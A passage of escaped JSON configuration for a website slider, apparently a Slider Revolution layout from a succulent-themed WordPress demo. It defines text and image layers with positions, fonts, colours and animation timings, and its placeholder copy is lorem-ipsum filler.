"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"1\":{\"text\":\"Succulets is simply dummy text of the printing and\\n\",\"alias\":\"1\",\"uid\":1,\"size\":{\"width\":{\"d\":{\"v\":\"356px\",\"e\":true},\"n\":{\"v\":\"356px\",\"e\":true},\"t\":{\"v\":\"354px\",\"e\":true},\"m\":{\"v\":\"311px\",\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"v\":\"26px\",\"e\":true},\"t\":{\"v\":\"26px\",\"e\":true},\"m\":{\"v\":\"26px\",\"e\":true}},\"originalWidth\":\"356px\"},\"position\":{\"x\":{\"d\":{\"v\":\"542px\",\"e\":true},\"n\":{\"v\":\"300px\",\"e\":true},\"t\":{\"v\":\"17px\",\"e\":true},\"m\":{\"e\":true}},\"y\":{\"d\":{\"v\":\"216px\",\"e\":true},\"n\":{\"v\":\"113px\",\"e\":true},\"t\":{\"v\":\"204px\",\"e\":true},\"m\":{\"v\":\"100px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":6,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":6,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":2000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1000,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1000,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1000,\"start\":2000,\"startRelative\":990,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#959595\",\"e\":true},\"n\":{\"v\":\"#959595\",\"e\":true},\"t\":{\"v\":\"#959595\",\"e\":true},\"m\":{\"v\":\"#959595\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"v\":\"16px\",\"e\":true},\"n\":{\"v\":\"16px\",\"e\":true},\"t\":{\"v\":\"16px\",\"e\":true},\"m\":{\"v\":\"14px\",\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"25px\",\"e\":true},\"n\":{\"v\":\"25px\",\"e\":true},\"t\":{\"v\":\"25px\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#959595\",\"e\":true},\"n\":{\"v\":\"#959595\",\"e\":true},\"t\":{\"v\":\"#959595\",\"e\":true},\"m\":{\"v\":\"#959595\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\"},\"3\":{\"text\":\"succulents@select-themes.com\",\"alias\":\"Email\",\"uid\":3,\"size\":{\"width\":{\"d\":{\"v\":\"227px\",\"e\":true},\"n\":{\"v\":\"226px\",\"e\":true},\"t\":{\"v\":\"222px\",\"e\":true},\"m\":{\"v\":\"222px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"30px\",\"e\":true},\"n\":{\"v\":\"23px\",\"e\":true},\"t\":{\"v\":\"23px\",\"e\":true},\"m\":{\"v\":\"23px\",\"e\":true}},\"originalWidth\":\"227px\",\"originalHeight\":\"30px\"},\"position\":{\"x\":{\"d\":{\"v\":\"549px\",\"e\":true},\"n\":{\"v\":\"310px\",\"e\":true},\"t\":{\"v\":\"1px\",\"e\":true},\"m\":{\"v\":\"-4px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"336px\",\"e\":true},\"n\":{\"v\":\"213px\",\"e\":true},\"t\":{\"v\":\"308px\",\"e\":true},\"m\":{\"v\":\"198px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":7,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":7,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":2000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1000,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1000,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1000,\"start\":2000,\"startRelative\":990,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#3c3c3c\",\"e\":true},\"n\":{\"v\":\"#3c3c3c\",\"e\":true},\"t\":{\"v\":\"#3c3c3c\",\"e\":true},\"m\":{\"v\":\"#3c3c3c\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"Quicksand \",\"fontSize\":{\"d\":{\"v\":\"14px\",\"e\":true},\"n\":{\"v\":\"14px\",\"e\":true},\"t\":{\"v\":\"14px\",\"e\":true},\"m\":{\"v\":\"14px\",\"e\":true}},\"fontWeight\":{\"d\":{\"v\":\"700\",\"e\":true},\"n\":{\"v\":\"700\",\"e\":true},\"t\":{\"v\":\"700\",\"e\":true},\"m\":{\"v\":\"700\",\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#3c3c3c\",\"e\":true},\"n\":{\"v\":\"#3c3c3c\",\"e\":true},\"t\":{\"v\":\"#3c3c3c\",\"e\":true},\"m\":{\"v\":\"#3c3c3c\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\"},\"7\":{\"text\":\"Image 5\",\"alias\":\"Logo\",\"uid\":7,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/logo-1.png\",\"imageId\":52},\"size\":{\"width\":{\"d\":{\"v\":\"326px\",\"e\":true},\"n\":{\"v\":\"326px\",\"e\":true},\"t\":{\"v\":\"326px\",\"e\":true},\"m\":{\"v\":\"326px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"54px\",\"e\":true},\"n\":{\"v\":\"54px\",\"e\":true},\"t\":{\"v\":\"54px\",\"e\":true},\"m\":{\"v\":\"54px\",\"e\":true}},\"originalWidth\":470,\"originalHeight\":78,\"aspectRatio\":{\"d\":{\"v\":6.025641025641025549930418492294847965240478515625},\"n\":{\"v\":6.025641025641025549930418492294847965240478515625},\"t\":{\"v\":6.025641025641025549930418492294847965240478515625},\"m\":{\"v\":6.025641025641025549930418492294847965240478515625}}},\"position\":{\"x\":{\"d\":{\"v\":\"542px\",\"e\":true},\"n\":{\"v\":\"300px\",\"e\":true},\"t\":{\"v\":\"229px\",\"e\":true},\"m\":{\"v\":\"1px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"158px\",\"e\":true},\"n\":{\"v\":\"58px\",\"e\":true},\"t\":{\"v\":\"603px\",\"e\":true},\"m\":{\"v\":\"42px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":8,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":8,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":2000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1000,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1000,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1000,\"start\":2000,\"startRelative\":990,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"9\":{\"text\":\"typesetting industry lorem ipsum lorem dummy text of \",\"alias\":\"2.\",\"uid\":9,\"size\":{\"width\":{\"d\":{\"v\":\"383px\",\"e\":true},\"n\":{\"v\":\"382px\",\"e\":true},\"t\":{\"v\":\"381px\",\"e\":true},\"m\":{\"v\":\"336px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"23px\",\"e\":true},\"n\":{\"v\":\"26px\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"23px\",\"e\":true}},\"originalWidth\":\"383px\",\"originalHeight\":\"23px\"},\"position\":{\"x\":{\"d\":{\"v\":\"547px\",\"e\":true},\"n\":{\"v\":\"300px\",\"e\":true},\"t\":{\"v\":\"180px\",\"e\":true},\"m\":{\"e\":true}},\"y\":{\"d\":{\"v\":\"250px\",\"e\":true},\"n\":{\"v\":\"142px\",\"e\":true},\"t\":{\"v\":\"234px\",\"e\":true},\"m\":{\"v\":\"127px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"right\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":9,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":9,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":2000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1000,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1000,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1000,\"start\":2000,\"startRelative\":990,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#959595\",\"e\":true},\"n\":{\"v\":\"#959595\",\"e\":true},\"t\":{\"v\":\"#959595\",\"e\":true},\"m\":{\"v\":\"#959595\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"v\":\"16px\",\"e\":true},\"n\":{\"v\":\"16px\",\"e\":true},\"t\":{\"v\":\"16px\",\"e\":true},\"m\":{\"v\":\"14px\",\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"25px\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#959595\",\"e\":true},\"n\":{\"v\":\"#959595\",\"e\":true},\"t\":{\"v\":\"#959595\",\"e\":true},\"m\":{\"v\":\"#959595\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\"},\"10\":{\"text\":\"the printing lovely fonts and lovely. 